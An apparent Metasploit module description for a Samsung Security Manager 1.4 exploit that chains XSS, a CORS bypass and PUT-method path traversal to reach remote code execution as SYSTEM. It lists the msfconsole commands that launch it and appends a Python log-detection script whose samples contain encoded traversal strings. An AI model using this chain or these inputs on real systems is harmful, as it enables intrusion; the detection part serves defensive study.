Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution
This is an exploit against Samsung Security Manager that bypasses the patch in ZDI-15-156 and ZDI-16-481 by exploiting the vulnerability from the client side. It has been tested successfully in IE, Firefox and Chrome: a GET request XSS is abused to bypass CORS and reach the vulnerable PUT method. Finally, a traversal in the PUT request uploads the code to a location of the attacker's choosing, which gives RCE as SYSTEM.
- mr_me <mr_me [at] offensive-security.com>
- Samsung Security Manager 1.32 & 1.4 Universal
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
    msf > use exploit/windows/browser/samsung_security_manager_put
    msf exploit(samsung_security_manager_put) > show targets
        ...targets...
    msf exploit(samsung_security_manager_put) > set TARGET <target-id>
    msf exploit(samsung_security_manager_put) > show options
        ...show and set options...
    msf exploit(samsung_security_manager_put) > exploit
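
For defenders, the final step described above (a PUT request whose path contains a traversal) can be hunted for in HTTP access logs. The following is an added detection example, not part of the Metasploit module or the original page. It assumes NCSA common-format log lines, and the sample lines, paths and file names are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: NCSA common/combined access-log lines; adapt the regex to your log source.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def normalize(path, max_rounds=3):
    """Percent-decode repeatedly (catches double encoding) and unify slashes."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def is_traversal_put(line):
    """True when the line is a PUT whose decoded path contains a '..' segment."""
    m = REQUEST.search(line)
    if not m or m.group("method") != "PUT":
        return False
    raw_path = m.group("target").split("?", 1)[0]  # drop the query string first
    return ".." in normalize(raw_path).split("/")

def suspicious_puts(lines):
    """Return the log lines worth triaging, in their original order."""
    return [line for line in lines if is_traversal_put(line)]

# Constructed sample lines (invented paths and file names, not captured traffic).
SAMPLE = [
    '127.0.0.1 - - [01/Jan/2017:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2017:10:00:01 +0000] "PUT /upload/report.txt HTTP/1.1" 204 0',
    '127.0.0.1 - - [01/Jan/2017:10:00:02 +0000] "PUT /upload/..%5c..%5capp/file.bin HTTP/1.1" 204 0',
    '127.0.0.1 - - [01/Jan/2017:10:00:03 +0000] "PUT /upload/%252e%252e/app/file.bin HTTP/1.1" 204 0',
    '127.0.0.1 - - [01/Jan/2017:10:00:04 +0000] "GET /view?f=../a HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in suspicious_puts(SAMPLE):
        print("ALERT:", hit)
```

Only the two PUT lines with backslash-encoded and double-encoded traversal are flagged; the plain PUT and the GET with `..` in its query string are not.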